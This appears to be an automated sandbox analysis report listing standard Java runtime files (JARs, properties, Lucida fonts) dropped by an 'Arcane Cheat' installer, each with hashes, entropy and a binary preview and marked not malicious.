                                SSDEEP:49152:ZxJ9lXlkEhZWLyyQSgxv1/FGfnIWkRXe2p0F7tjRozGfVgMS55pU13JbL5xli3d6:ZhLk2bBSgnFGfnhAXLzAeylvi3dGT
                                MD5:042B3675517D6A637B95014523B1FD7D
                                SHA1:82161CAF5F0A4112686E4889A9E207C7BA62A880
                                SHA-256:A570F20F8410F9B1B7E093957BF0AE53CAE4731AFAEA624339AA2A897A635F22
                                SHA-512:7672D0B50A92E854D3BD3724D01084CC10A90678B768E9A627BAF761993E56A0C6C62C19155649FE9A8CEEABF845D86CBBB606554872AE789018A8B66E5A2B35
                                Malicious:false
                                Preview:PK...........H................META-INF/....PK...........H..>.g...g.......META-INF/MANIFEST.MFManifest-Version: 1.0..Ant-Version: Apache Ant 1.8.2..Created-By: 1.8.0_40-b27 (Oracle Corporation)....PK..........H................com/PK..........H................com/sun/PK........j..H................com/sun/deploy/PK........j..H................com/sun/deploy/uitoolkit/PK........j..H................com/sun/deploy/uitoolkit/impl/PK...........H............!...com/sun/deploy/uitoolkit/impl/fx/PK...........H............$...com/sun/deploy/uitoolkit/impl/fx/ui/PK...........H................com/sun/deploy/uitoolkit/impl/fx/ui/resources/PK...........H............4...com/sun/deploy/uitoolkit/impl/fx/ui/resources/image/PK........}..H................com/sun/glass/PK...........H................com/sun/glass/events/PK...........H................com/sun/glass/ui/PK...........H................com/sun/glass/ui/delegate/PK...........H................com/sun/glass/ui/win/PK..........H................com/su

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\ext\localedata.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):1178848
                                Entropy (8bit):7.964832897711047
                                Encrypted:false
                                SSDEEP:12288:qLvFVMHxMyEg7+dYmx0nqEdgq2C942bjAHcOveMdDLtHHicwqJM5SznKMWKdk/H2:cF9rYmxQ5tOcOdFwqSYzn0DfYHs4jOBK
                                MD5:24857AD811CEDA70BD0F087FD28B5B6E
                                SHA1:707305EB10B1464D40BDEABADE77B80B984A621A
                                SHA-256:321D646AD29A5B180CA98BB49E81C2C732523B7E5145A3C568766CEC06B2B1CD
                                SHA-512:A10A340BDB2DE2D0D14ED804F04313D1D4CBD64EF0513A9E54B7FA95FFB05F2123C9095A4B2BFFA4DDF3ADEA9A67E978D26D115A8F5677AE1BD0EE67C416FA5A
                                Malicious:false
                                Preview:PK........u..H................META-INF/......PK..............PK........u..H................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.JM,IM.u.........+h..%&.*8.....%...k.r.r..PK..<:S1C...D...PK...........H............,...sun/text/resources/ar/CollationData_ar.classm..O.A...Y[("...E..Q.....z....M.1A.f....m.n.G|._.WP@.R^T.D._.......b.N.H.....<..!._....!...j...#bCD.U..*.1"6ED.#*[..xp....;.:"....Q..O.'..:....3..5.~.J.~2.8.a.......e/....S....A.#.c.l...<n.ljM%.^.O%.y.w.K.;jD.X...._......,.B'\.;'.K.{...x.G..cL...9^`..x.W..0F....!...P.8&0.)..[..+.e.T.\.+w."g.YW.E...]....[....c....}.(.b..m1n..<`..[,..-&m...C.....W....}..k>y..x.....X K.fY..1.1..L.z.;.K.....n}..4...f0..|6.}..0..X."..+=.........n...6.Y.............l.o..%..w.8Ks..gq......3t/8C.........~<..<.3<....%....0F...(r..1..\5s..UO..jf..L..f...........................!.!.!.!.!.!.a..............................n&..... ..3.76.....#....l.OD......G.../..J.W..*...k5.V..........?.V..6...F...t.....X...X.

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\ext\meta-index (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1511
                                Entropy (8bit):5.142622776492157
                                Encrypted:false
                                SSDEEP:24:EV677x6CFRf08P86xX+4jz98ht4QLlJVzDOFw5DOFFVzDOFvVzDOFz5qlV/FRARV:EE796OfT0OZjzGs6lDitfitigXFqX6Kp
                                MD5:77ABE2551C7A5931B70F78962AC5A3C7
                                SHA1:A8BB53A505D7002DEF70C7A8788B9A2EA8A1D7BC
                                SHA-256:C557F0C9053301703798E01DC0F65E290B0AE69075FB49FCC0E68C14B21D87F4
                                SHA-512:9FE671380335804D4416E26C1E00CDED200687DB484F770EBBDB8631A9C769F0A449C661CB38F49C41463E822BEB5248E69FD63562C3D8C508154C5D64421935
                                Malicious:false
                                Preview:% VERSION 2..% WARNING: this file is auto-generated; do not edit..% UNSUPPORTED: this file and its format may change and/or..% may be removed in a future release..! access-bridge-32.jar..com/sun/java/accessibility/..! access-bridge.jar..com/sun/java/accessibility/..! cldrdata.jar..sun/text..sun/util..# dnsns.jar..META-INF/services/sun.net.spi.nameservice.NameServiceDescriptor..sun/net..! jaccess.jar..com/sun/java/accessibility/..# localedata.jar..sun/text..sun/util..# nashorn.jar..jdk/nashorn..META-INF/services/javax.script.ScriptEngineFactory..jdk/internal..# sunec.jar..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# sunjce_provider.jar..com/sun/crypto/..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# sunmscapi.jar..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# sunpkcs11.jar..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# zipfs.jar..META-INF/services/java.nio.file.spi.FileSystemProvider..com/sun/nio/..# jfxrt.jar..META-INF/INDEX.LIST..com/sun

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\ext\nashorn.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):2018860
                                Entropy (8bit):7.9328569913001905
                                Encrypted:false
                                SSDEEP:49152:fBkB7GOrPDSz0fHaIU1KDWtHkLs0amlyYu:fBkoOruSHa/4y/FmA
                                MD5:F3E3E7769994C69DFF6E35EF938443CA
                                SHA1:758F42C0A03121AD980DC98BE82DCAF790679E79
                                SHA-256:CF0268FF39D19876BD42BF59E2CE93BB9AA57E5EE98C212BAE0184BD87F2D35A
                                SHA-512:AB4801E8538B9B84124D2B8C36E64232F16DA686C5FA565C5DE2091C910806A850464F5CCC79C9320DF6F8CB943633FC38FEA63F9E0593A44E3541F15F126951
                                Malicious:false
                                Preview:PK........o..H................META-INF/......PK..............PK........o..H................META-INF/MANIFEST.MFm....0.E.&...:..q.0.....W.g(>Z.v..E4,...{o..>1&y...w.0JsV....<..A..M.bs.. ......F|.Y... .Bt.K9...N%.).s.D.qVC.......c?......'..B,k...&.......i?^0...o...PK..\K:x........PK........i..H............6...jdk/internal/dynalink/beans/AbstractJavaLinker$1.class.S.N.Q..N[.mY.".....T......7.%....A...t..n..m........k51.....2..H.51....o..|..9?~~;....9..J.Y.g...5......M%.4......z....=..v.OF"..7.#....-.e......nU...G^ K.a/.BF.....y.....*C.C.^..!.R.eH.....j....aK.M...3].....=..;'.;]j*..>C....#*.:..Z.(.N...JvEX.I.e..A..."j...C....t.C.q..:..>.J1}...z`..v...[.. .QTa..kXeX..'.1O.c..1...x..W..a.....3.Gl.VG8.C.tE5P...rN.&.v.....F.V.{.say.0^~m.....e....VW.B..x.h..u.i.K..F..j.[;;..Z.z.^f.8.q~.nR.n....Q.2..$.)B.$..|.;.....'.&. .j|@.E....FP#....A-..."...b.n.".H/c..Ho..s.I./.X..p...}..]F....SP.L.u."@..$o.9.b.'.!.;X~6..PK..]./.<...H...PK........i..H............K...jdk/internal

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\ext\sunec.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):39771
                                Entropy (8bit):7.92713480980539
                                Encrypted:false
                                SSDEEP:768:ah0EOq/w9b3jpSo40ROLB2CUrQbNVkJBtw6pcZWztpQeA4Uz7NWnZVNB3gX083/z:aJOyw9b3joo4hLB2CUr2yBw6pcMtpS44
                                MD5:A269905BBB9F7D02BAA24A756E7B09D7
                                SHA1:82A0F9C5CBC2B79BDB6CFE80487691E232B26F9C
                                SHA-256:E2787698D746DC25C24D3BE0FA751CEA6267F68B4E972CFC3DF4B4EAC8046245
                                SHA-512:496841CF49E2BF4EB146632F7D1F09EFA8F38AE99B93081AF4297A7D8412B444B9F066358F0C110D33FEA6AE60458355271D8FDCD9854C02EFB2023AF5F661F6
                                Malicious:false
                                Preview:PK.........r.F................META-INF/MANIFEST.MF..I..H....Q..C.f.X..*b......lz..$..dK6..7U....N.5...... .GT.......[.{a...8#(FI......%Ao==...U%%.QOIjL....'.o../..q.q.!....k..)}..4...@J..~\....@..z0._.*....L....=..z.=?)..%... n......HoY.>?........]....Nz..,..c./........6$.@....1.2.X...`:G.j.S..IP.-X...0..8jk...|.....YF.b..u.9...F\.j......y.*Q.'..2.i.S.D...z.j...a..a..L.o..+v. .!.h..8H...d..R.d1a...A.9........zC..Z_.p.`...).t. ...q.1.......\...RS."..11.C.Y..I...J.(.(x.m..N..('[..C.o....H..].<#.%....CZ....[....Y......g..=.2...........I....qm.-....(..BZF.r8=.C(F...I.."...$W....]...9..0b......]...5.M.....`"."k...k....T\....WZQ.>.8..KF..g[Y.c5.s...U..-c....!v..$.rG......1T....bb.s>..R.w....&8.*NX@o+...~,K..2..yI..._f^.l@..|.....U...^...#.P.u!.#..g@/d.<.../..:..V.[.6B.TG....>.D..R\.k....E.E.O4K..Z....f.,..f......hRW...) X......\M.#!)..H..b..f...w..R....w.=.........PC.#...K..|..d.S..Ms.]4q.....c..f......}.NF^.7d...|.*..^\n.l.D..V......

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\ext\sunjce_provider.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):279427
                                Entropy (8bit):7.90277234368113
                                Encrypted:false
                                SSDEEP:3072:E/Ieog0SgEOU8pqHbQpr16jWun5bT1aReAaTFMzpx2Xcpll+PrA3YaRBlLi:E/m9eJsppCLJTURe9TFMrQ0fkUK
                                MD5:B04074A9FC78DC1409168E1E2D139647
                                SHA1:54182C904A48364FC572E3A2631DF14823C29CEF
                                SHA-256:BFAD3FB11E7115AAF34719488551BF3205B2FAFFB38681C7F6BDAD19BB7568C2
                                SHA-512:E97CA3D53E867E957BF467688F83C53B2FD6FF1EA001B19F03A23096581DC8ADCEC7C1403D164D063B1A437E4BF6FA98E1543626849D4E17E31156CB012F9599
                                Malicious:false
                                Preview:PK........aZ.H................META-INF/MANIFEST.MF.|I..V..".?xP...p.#..7.G D.N.......~...)....ic.;..[.k.../3...5.5........O....x....6c4>...].u....h.~2.f,n.O|3.}.|<..._}..o........K..Z.=.$m....>...'....O?...G.>&..)no.......Z=...k..~...O.z....c.|(..9.=..|....q.vc....}..i.3.~.}x...~.?.+..._...}.......|..,.,..&`.s..=.....h...%.g.'~..i......p.;A..B..99{....E..k........)......^IW!.._....+..)....d._0...s......v..R.c.*]..0.C..Z}.....j..O%.I.....J.%..).Q..=..0.J.J...A......%T...$..h.#.N%N.e.ne...=DV.......+.....(..f...yn.P..-...f.ON..d=8-....B.^......S.+........$V`..uz....US..h.8.4^Y-;4.M.+i...dw.9.x..k.]...\u..j{<.....r.....y}.E.....X.~%....zF;.<....+-...X.I.I..]..N`.2.G....c~..J.r.o@..My.(.H,...b.e...5'e./...b;D~.%....};....J....1k5CrO..6....n.....>.t..0a.......,.J./;.q.y...w...J.t&s.2.sYk....1...5..._x.....Q..M.J...N.y3{....R..~.F..V......'z...{|..j5..../.;.NCGG\.....!M...Pfe/l..).zL..9.4....?..o.....}.F..M....~.L.q.] ..x.v..d.]G[...q$.E.o...r.(..

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\ext\sunmscapi.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):32699
                                Entropy (8bit):7.878192531974338
                                Encrypted:false
                                SSDEEP:768:iLy1giOqjU0jNVmOTuDQJD/RpAczsikFfg0y+7aBTS73dyPoXvvKv2PtvHubyKhi:i4giOaU0jNVmOCADZpVsiUf3yua5S7t7
                                MD5:2249EAC4F859C7BC578AFD2F7B771249
                                SHA1:76BA0E08C6B3DF9FB1551F00189323DAC8FC818C
                                SHA-256:A0719CAE8271F918C8613FEB92A7591D0A6E7D04266F62144B2EAB7844D00C75
                                SHA-512:DB5415BC542F4910166163F9BA34BC33AF1D114A73D852B143B2C3E28F59270827006693D6DF460523E26516CAB351D2EE3F944D715AE86CD12D926D09F92454
                                Malicious:false
                                Preview:PK........)..H................META-INF/MANIFEST.MF....X.........ad2....@..%E..M.^.x.. O_dW.5Qi..8.....).aY=.!.Q....g..AM..&0....d.*./#..yM+......g.[.O..$....I?>X9..G......h.]...".y....do.O..2.Y.\^...}+....p2..u.]...V0}....&..a.C...-.....n.....M...M.F..,.....v@...>>|..["J...U7")..#b.oV.a...l.g..e.s..L.D..={.-gLEt.....!/... q....z.J...0.2e...=.....[]{..N...1....Z.....2...I.k...Sy..Qm...{....;.On..!.@..S.IZ..=......Lo.N4..|.j...!.l..G..}.Q....u....ADh.z.w.-..@%.@...!.".R.nHE.P]..J!..E.9Sw.LM7.&...[v..~.P...bp;.....:id.e..o.h..8.C....l...70..].gp..7.<.P.....Zj.....M......-.(@~...M^.....asJ.Y.1.e...(qW..h.c.Iu...-.A..?.5.Ex.S.oc6.).Qkr..+....|..._..H..!7..hs.r.;.z=.....*#.c....6...O+q.I.....|.4.V....Y.T.....4XO..4.>..1.$h..lu..l0..?...w.......o.u....6..)BG'..f......d.v...........<.i..Bj..d..L.....G.r@1.....0..d......'...........*.rK....5x..8.V..9(..Y.`'.k.N....3b.rx.p..c...M_j%..U.z.|Y.1\....d...-I.<g........-.h.*.F...me.F..p.c.o..

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\ext\sunpkcs11.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):250826
                                Entropy (8bit):7.951088517189604
                                Encrypted:false
                                SSDEEP:6144:dKtThM4XbBG7v3jUAbE0MEIynrI25ENN/kv1Pv:dKphM4X1G7PjlbE0MxHLbC
                                MD5:2E33D8F1FBEB9239C6FFC0D36DE772D1
                                SHA1:3F881E3B34693A96CD3D9E20D6AEABAE98757359
                                SHA-256:938C497E97E893D0B9325522475AD9FB2C365A4AF832ED180B570C3E4E6FD559
                                SHA-512:DB9A5B0F269BBFC9CB712D8BF170414D649CD72F0DEECCDC3A4D742430E2E29E203F7E462D2DF8F9EC2C82723A8A56FF8FD409CDCBE66547C798B15370B8DB65
                                Malicious:false
                                Preview:PK........mS.F................META-INF/MANIFEST.MF.{.........3.. l@ .G...D.#49A/...........Z.jTUj.{g.\.r..4y...n2.y.........s.UI.4S0=_...*....,..sn..N.p..m..C.....F|{..%Q.....m.v...6.Q.|a.k.?....}...../Q[.6..?.....*..v..P....>..O.:%.E..........o.uS..O..S..Jo....}../.........z.b.....?}_..%pL.y....h.aP.a...1....)..$..IH....v.-..q|..D.z8b..y.<...x..M.K]b=.+.0nSt.co(.-.............C.u..2.W..3...+.....9.d.......L..</..P..z+n..JR;V..K....>...D.....<.....=..+e....>L..`......g.....Os..Ly..T..a.`.}.......Z...R..S...c..z......x.U..)...J.........e..=rr..^K.....hY2.U....e........N.9..r).#!V[..`...B.......CW.}o.q......u7..h0?6.P.14N.-J.\.!u`....H..l...1'J=[.+.-.....X.9.@.......a{C.).Z..P(W.}O...%./..XG=...^..N.enV.F<..oW.|....CJ.....\x..g;v.L.Wf...N.#..*..!.L..:.MD.Vy.z.0.L..72...|.=..eB6(z....#:8D..ig....U....SO.t......0_...>S...}.L.ze....=...k&.[...U^p.$...(........m.z.....~.F..........h......z3<LO.y..4.......w.3.......,W8(..3UF.R.....J)J..q.....Z.d.;

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\ext\zipfs.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):68923
                                Entropy (8bit):7.950933538093809
                                Encrypted:false
                                SSDEEP:1536:YNSe2yN5DbD630l1MIeEfqjGWb2LU2j6rnbisZp/u:Ne2yNhDVl1leEP/qn2sZk
                                MD5:4D507E8D7BBF5ECEC8791CBA57B1CE17
                                SHA1:A66C0D4648A06B9078252D090D596C91C591AA50
                                SHA-256:C3993DF765AFF1068A656B28A7A4EDFFE7710AE3B6AA2EA056A6F9C3EDBDC210
                                SHA-512:21B4E729B16947B31657DC5F7F5C75DCDA9F94B4A0ED414E11A6D02951137AC266D605855DDDA7C21BE0200EA07530962D1ECE2FAE009EAE5F2A1A365195C995
                                Malicious:false
                                Preview:PK........b..H................META-INF/......PK..............PK........b..H................META-INF/MANIFEST.MF..;..0...@...uhI.J6-...E.U..-..(I,..m.|Up=..;.B.:.19...Y.Y*8+M.....p,m...F.....?..zRQ..........l....C..]....cO..T.......ds...(.9,...[.~...;.....>....Y.*T6)4. .3..PK.../.?....L...PK........I..H............-...com/sun/nio/zipfs/JarFileSystemProvider.class.U]S.U.~NH.a.@..B.\.!.$.U[.X..J..H..G...$,Mv.....z....9...........Z.d..a.1.y...<..s.y...~....x&c......q..B.`B.......'b.4...'e.1%......i!f../aV.L......B,.XD..KX.......V..^..@....`SD..`[.C._0.'..p.2.EF...SV.3t-.&OW.Yn....i....vx..=..]}O.J.Y.2.m..q.Tmc.Z.....H.arW[[I.7.L...F.k.E&...../.z.J...,U. QD...%....v...".+s.-f.....e..3....."..bvu[..b..Ag.<I7U*.^J..j....~.W\.2....i.j..1C7..:..U.QM.UG.d.c`4.8.Pf..MA.E.;0...1.r..bX..$l>h..%..,h.*..."^=m.90]}.T.}'.&...B;m.-.9.\T....x.p.laD.....#..U.r..P..o...(.a.....`.E.....*1..4-......fT......H.*kN..1....r.Z"7.J+d....B5.'U...e.).!...rt...^.p3..k.8.j.:..k5T....".

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\flavormap.properties (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4005
                                Entropy (8bit):4.909684349537555
                                Encrypted:false
                                SSDEEP:96:5Th0S7zmtRUioj/DUXBZZjM8mcWoe+YfVktH:5h0Iz6Uioj/YXLZjnmdoeDktH
                                MD5:B0CE9F297D3FEC6325C0C784072908F1
                                SHA1:DD778A0E5417B9B97187215FFC66D4C14F95FEF0
                                SHA-256:6DA00C1CBE02909DCD6A75DA51D25DBF49BFD1D779C0B8E57B12E757229FC4A8
                                SHA-512:4C774BCB9ADE996569C86DD46B3BDB046771AD1BCF9AABB9DB86854C83E18015CBE5DF73DA86EE98E26BA0393F548B1CC09DE60BDA4248EACC4FC833E23B8AB4
                                Malicious:false
                                Preview:#..# This properties file is used to initialize the default..# java.awt.datatransfer.SystemFlavorMap. It contains the Win32 platform-..# specific, default mappings between common Win32 Clipboard atoms and platform-..# independent MIME type strings, which will be converted into..# java.awt.datatransfer.DataFlavors...#..# These default mappings may be augmented by specifying the..#..# AWT.DnD.flavorMapFileURL ..#..# property in the appropriate awt.properties file. The specified properties URL..# will be loaded into the SystemFlavorMap...#..# The standard format is:..#..# <native>=<MIME type>..#..# <native> should be a string identifier that the native platform will..# recognize as a valid data format. <MIME type> should specify both a MIME..# primary type and a MIME subtype separated by a '/'. The MIME type may include..# parameters, where each parameter is a key/value pair separated by '=', and..# where each parameter to the MIME type is separated by a ';'...#..# Because SystemFla

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\fontconfig.bfc (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:raw G3 (Group 3) FAX
                                Category:dropped
                                Size (bytes):3670
                                Entropy (8bit):4.40570512634857
                                Encrypted:false
                                SSDEEP:96:IRsY7hGbXWvaBKvKY5csW4BxciETBT5Bxrws+LW/B56JF:At/vaBKvKY5fxci8jMWY
                                MD5:E0E5428560288E685DBFFC0D2776D4A6
                                SHA1:2AE70624762C163C8A1533F724AA5A511D8B208E
                                SHA-256:AAE23ACC42F217A63D675F930D077939765B97E9C528B5659842515CA975111F
                                SHA-512:C726CC2898399579AFA70ACACE86BEC4369D4541112243E51721568B4D25DCC6C66FA64AC475AFF9BA9DE07A630B24A9F221FA00426AD36845203BA809219E3C
                                Malicious:false
                                Preview:...%.........6.Y.j.{.........+...........6.=.:.-.9.;.<.3...0.4./.2.8.1.5.7......................................................................................................................................... ............... .........................................................................................................................D.C.I.F.A.G.E.B.?.@.>.H...........................................................................................!.".#.$.%.&.'.(.).*.+.+.+.+.+.J.M.U.^.f.e.X.W.d.V.R.\._.`.a.Y.O.Z.P.S.K.Q.N.[.c.L.T.].b.g.j.}...r.q.l.{.z.....p.o.|.s.k.w.~.t.x.v.y.........h.u.i.m.........n.................................................................................................................................................!......."........... .................#.(.-.2.7.<.A.F.K.P.U.[.a.g.m.s.y......................................................... .(.5.;.H.U.d.v...............................*.4.?.H.T.].i.s.~.............................".7.@.J.R.R.^.i

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\fontconfig.properties.src (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):10779
                                Entropy (8bit):5.217016051711063
                                Encrypted:false
                                SSDEEP:192:Pj2TlKg7RzPc/mOHUFN5HX/rS8QbWZjjfVpMbtxp8lcR9NN:Pj6Y8NcFzXbWZjj9pSMlcz
                                MD5:0C1DB7410938A3634BD9928BA2F284CB
                                SHA1:7EE31F22136E73A2A3D0AAB279199778BAAB06F5
                                SHA-256:818A718788E5506EBB84F26DE82B6C60E08861876400E9ED3931346174D5D7FB
                                SHA-512:EE267E59564A077713856A307382D40D0D8DF8E7EC2EF930723B076F5E38446D3B2600D10AC192262F9A3A86D9973CF13A9E90D180818C05A6C7896A5BD7AD19
                                Malicious:false
                                Preview:#..# ..# Copyright (c) 2003, 2011, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....# Version....version=1....# Component Font Mappings....allfonts.chinese-ms936=SimSun..allfonts.chinese-ms936-extb=SimSun-ExtB..allfonts.chinese-gb18030=SimSun-18030..allfonts.chinese-gb18030-extb=SimSun-ExtB..allfonts.chinese-hkscs=MingLiU_HKSCS..allfonts.chinese-ms950-extb=MingLiU-ExtB..allfonts.devanagari=Mangal..allfonts.dingbats=Wingdings..allfonts.lucida=Lucida Sans Regular..allfonts.symbol=Symbol..allfonts.thai=Lucida Sans Regular..allfonts.georgian=Sylfaen....serif.plain.alphabetic=Times New Roman..serif.plain.chinese-ms950=MingLiU..serif.plain.chinese-ms950-extb=MingLiU-ExtB..serif.plain.hebrew=David..serif.plain.japanese=MS Mincho..serif.plain.korean=Batang....serif.bold.alphabetic=Times New Roman Bold..serif.bold.chinese-ms950=PMingLiU..serif.bold.chinese-ms9

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\fonts\LucidaBrightDemiBold.ttf (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc. Pat. Des 289,422.Lucida BrightDemiboldLucida Bright Dem
                                Category:dropped
                                Size (bytes):75144
                                Entropy (8bit):6.849420541001734
                                Encrypted:false
                                SSDEEP:768:H8Jwt1GIlZ6l0/9tRWhc0x/YxvsTjyIDXCrGU/tlDaKAgKrTLznvzDJIZmjFA0zG:Mwtze9xQcQ/LDaKAgK3LLvzFogbFt5WD
                                MD5:AF0C5C24EF340AEA5CCAC002177E5C09
                                SHA1:B5C97F985639E19A3B712193EE48B55DDA581FD1
                                SHA-256:72CEE3E6DF72AD577AF49C59DCA2D0541060F95A881845950595E5614C486244
                                SHA-512:6CE87441E223543394B7242AC0CB63505888B503EC071BBF7DB857B5C935B855719B818090305E17C1197DE882CCC90612FB1E0A0E5D2731F264C663EB8DA3F9
                                Malicious:false
                                Preview:...........pLTSH$....#.....OS/2p.{........Vcmap.U.z...T...jcvt 8.E.........fpgm..1.........glyf@>.7...l....hdmx..(:...t..1.head.?....T...6hhea.U........$hmtx..ys...... loca..\4........maxp.8......... name..#.........postM.IA.......prepbM.h.......W.............).......).....d. ............................B&H.. . .3.D.\...... ................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{|}~......................................................................................................P...T.@.....~.............&.. . . . . " & 0 : D t .!"!&"."."."."."."+"H"`"e%................3..... .............&.. . . . . & 0 9 D t .!"!&"."."."."."."+"H"`"d%................3.........W.......M...d...............1.....j.y........t.q._./.0.......v.t.r.p.g.T.....R..........................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\fonts\LucidaBrightDemiItalic.ttf (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc.Lucida BrightDemibold ItalicLucida Bright Demibold Itali
                                Category:dropped
                                Size (bytes):75124
                                Entropy (8bit):6.805969666701276
                                Encrypted:false
                                SSDEEP:1536:lww80sTGzcKHwxWL0T+qHi/sbA06PoNORsr5sOnD0OyuusGa7bs4J:lwL0i97WL0T+qHA9cOR05FD0Oyup74w
                                MD5:793AE1AB32085C8DE36541BB6B30DA7C
                                SHA1:1FD1F757FEBF3E5F5FBB7FBF7A56587A40D57DE7
                                SHA-256:895C5262CDB6297C13725515F849ED70609DBD7C49974A382E8BBFE4A3D75F8C
                                SHA-512:A92ADDD0163F6D81C3AEABD63FF5C293E71A323F4AEDFB404F6F1CDE7F84C2A995A30DFEC84A9CAF8FFAF8E274EDD0D7822E6AABB2B0608696A360CABFC866C6
                                Malicious:false
                                Preview:...........pLTSH.....#.....OS/2k.{........Vcmap.U.z...T...jcvt =jC.........fpgm..1.........glyf.......h...Jhdmx.......`..1.head..X.......6hhea...;.......$hmtx.b......... loca..\....0....maxp...:...D... name .7]...d....postM..A........prep.C.f....................).......).....d. ............................B&H..!. .3.D.\...... ................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{|}~......................................................................................................P...T.@.....~.............&.. . . . . " & 0 : D t .!"!&"."."."."."."+"H"`"e%................3..... .............&.. . . . . & 0 9 D t .!"!&"."."."."."."+"H"`"d%................3.........W.......M...d...............1.....j.y........t.q._./.0.......v.t.r.p.g.T.....R..........................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\fonts\LucidaBrightItalic.ttf (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc. Pat. Des 289,773.Lucida BrightItalicLucida Bright Itali
                                Category:dropped
                                Size (bytes):80856
                                Entropy (8bit):6.821405620058844
                                Encrypted:false
                                SSDEEP:1536:jw9ESkPFybxWj1V7zbPUoOPjp85rFqXpLboVklDNTc2Wt:jwZO0xWPTU7l85rFYpLbott
                                MD5:4D666869C97CDB9E1381A393FFE50A3A
                                SHA1:AA5C037865C563726ECD63D61CA26443589BE425
                                SHA-256:D68819A70B60FF68CA945EF5AD358C31829E43EC25024A99D17174C626575E06
                                SHA-512:1D1F61E371E4A667C90C2CE315024AE6168E47FE8A5C02244DBF3DF26E8AC79F2355AC7E36D4A81D82C52149197892DAED1B4C19241575256BB4541F8B126AE2
                                Malicious:false
                                Preview:...........pLTSH...2..:L....OS/2p.|y.......Vcmap.U.z...T...jcvt F.;.........fpgm..1.........glyf.}.....@....hdmx?..p......1.head.A![.......6hhea.......P...$hmtx3..9...t... loca6..........maxp.......... name...p.......~postM..A...H....prep.......................).......).6...d. ............................B&H.... .3.D.\...... ................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{|}~......................................................................................................P...T.@.....~.............&.. . . . . " & 0 : D t .!"!&"."."."."."."+"H"`"e%................3..... .............&.. . . . . & 0 9 D t .!"!&"."."."."."."+"H"`"d%................3.........W.......M...d...............1.....j.y........t.q._./.0.......v.t.r.p.g.T.....R..........................................................................................................

